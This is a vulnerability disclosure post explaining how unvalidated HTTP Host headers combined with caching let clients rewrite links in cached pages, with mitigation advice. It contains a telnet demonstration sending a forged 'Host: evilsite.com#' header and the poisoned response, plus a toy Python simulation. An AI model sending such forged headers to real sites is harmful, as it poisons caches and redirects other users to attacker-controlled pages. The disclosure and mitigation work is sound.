I've decided to post this here since it is pretty serious and there is no one vendor to blame. Watch yourselves.
Vulnerability: Rewriting of links and URLs in cached pages to arbitrary strings by unauthenticated HTTP clients.
Affected software: ANY site that does not validate HTTP Host: headers.
It is common practice for web programmers and web frameworks to rely on the value of the HTTP Host header to write links. This is for convenience, so that the same software will run on localhost, various testing servers, subdomains, secondary domains, etc., without modification. For example:
<a href="http://<?=$_SERVER['HTTP_HOST']?>/login">Login</a>
Looks familiar? This turns out to be a very, very bad idea in any language. The HTTP Host header is arbitrary text controlled by the client, but common practice treats it as though it were a safe environment variable.
The second half of the vulnerability comes when there is HTTP caching going on somewhere on the path between the site and users. This could be a caching proxy run by the site itself, or downstream in ISP proxies, content delivery networks (CDNs), syndicators, etc. Combined with the first half, this lets an attacker rewrite the URLs on any page they choose and plant that exploited page in caches that may be beyond the control of the victim site.
Let me demonstrate with a carefully scrubbed example. I don't wish to point anyone out, but I have successfully tested this exploit against several high-traffic websites, including a well-respected news organization. Several popular web frameworks are vulnerable by default.
The odds are relatively high that your website is vulnerable. Even if you don't do page caching, most ISPs do.
$ telnet www.example.com 80
Trying 1.2.3.4...
Connected to www.example.com.
Escape character is '^]'.
GET /foo/bar.html HTTP/1.1
User-Agent: Mozilla
Host: evilsite.com#

HTTP/1.1 200 OK
Date: Wed, 10 Jun 2008 00:27:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Wed, 17 Jun 2008 00:27:45 GMT
Content-Length: 2959
Content-Type: text/html; charset=iso-8859-1

<html>
<head>
<title>Foo : Bar</title>
</head>
<body>
<a href="http://evilsite.com#/">Home</a>
<a href="http://evilsite.com#/about">About</a>
<a href="http://evilsite.com#/login">Login</a>
[...snip...]
<hr>
<address>Apache Server at evilsite.com# Port 80</address>
</body></html>
Now, if there is any caching going on either by the site owners or any proxies along the way, other clients will get the exploited page.
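To make the mechanism concrete, here is a toy simulation in Python. It is a sketch under stated assumptions, not a model of any real proxy: `render_page` and `ToyCache` are hypothetical names, and the cache is assumed to key its entries on the request path alone. The last lines also show why the trailing `#` in the forged header matters: everything after it becomes a URL fragment, so the link points at evilsite.com.

```python
from urllib.parse import urlsplit


def render_page(host_header: str) -> str:
    """Hypothetical vulnerable page: builds a link from the raw Host header."""
    return f'<a href="http://{host_header}/login">Login</a>'


class ToyCache:
    """Hypothetical shared cache keyed on the path only (an assumption)."""

    def __init__(self):
        self.store = {}

    def fetch(self, path: str, host_header: str) -> str:
        # On a miss, forward the request (including the client's Host header)
        # to the origin and remember the response for later clients.
        if path not in self.store:
            self.store[path] = render_page(host_header)
        return self.store[path]


cache = ToyCache()

# The attacker requests the page first, with a forged Host header.
cache.fetch("/foo/bar.html", "evilsite.com#")

# A later, honest client asks for the same path and gets the poisoned copy.
victim_page = cache.fetch("/foo/bar.html", "www.example.com")
print(victim_page)

# The '#' turns the site's own path into a fragment, so the link's host
# is evilsite.com and "/login" is never sent to any server.
parts = urlsplit("http://evilsite.com#/login")
print(parts.hostname, parts.fragment)
```

Real caches vary in how they build their cache keys; the sketch only illustrates the case where the key does not reflect the forged header while the origin still echoes it.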
I don't know what else to say. I have no hard data to prove this exploit has been used before. Given its simplicity I would not be surprised to learn that it is as old as the protocol itself.
Mitigation: do NOT use the value of the Host header for anything. If you must, apply very strict filters to only allow valid FQDNs, and then whitelist the FQDNs you allow. Treat it as you would any arbitrary data coming from the outside. If your webserver is configured to output the value of the Host header (as in the example, and as by default in many webservers), disable that configuration.
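As a rough illustration of that advice, here is a minimal Python sketch that applies a strict format check and then an allowlist, and builds links from configuration rather than from the request. The names `ALLOWED_HOSTS`, `CANONICAL_BASE`, `validate_host` and `absolute_url` are hypothetical, and the hostnames are placeholders; adapt the idea to whatever framework or server you actually run.

```python
import re
from typing import Optional

# Hypothetical allowlist: the hostnames this site is actually served under.
ALLOWED_HOSTS = {"www.example.com", "example.com"}

# Hypothetical canonical base for generated links, taken from configuration
# and never from the request.
CANONICAL_BASE = "http://www.example.com"

# Strict shape check: dot-separated labels of letters, digits and hyphens,
# with an optional numeric port. Anything else (such as '#') is rejected.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOST_RE = re.compile(rf"({_LABEL}(?:\.{_LABEL})+)(?::(\d{{1,5}}))?")


def validate_host(host_header: str) -> Optional[str]:
    """Return the hostname if it is well-formed and allowlisted, else None."""
    match = _HOST_RE.fullmatch(host_header.strip().lower())
    if match is None:
        return None
    hostname = match.group(1)
    if len(hostname) > 253 or hostname not in ALLOWED_HOSTS:
        return None
    return hostname


def absolute_url(path: str) -> str:
    """Build links from configuration instead of the Host header."""
    return CANONICAL_BASE + path


for candidate in ("www.example.com", "evilsite.com#", "evilsite.com"):
    print(repr(candidate), "->", validate_host(candidate))
```

A request whose Host header fails `validate_host` should be rejected outright (for example with a 400 response) rather than served with a fallback page that might still end up in a cache.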
I've found only one reference that outlines the full consequences of this vuln, but it concentrates on the Zope framework.
https://bugs.launchpad.net/zope2/+bug/142848
Special thanks to Wayne Kao and Jon Frank.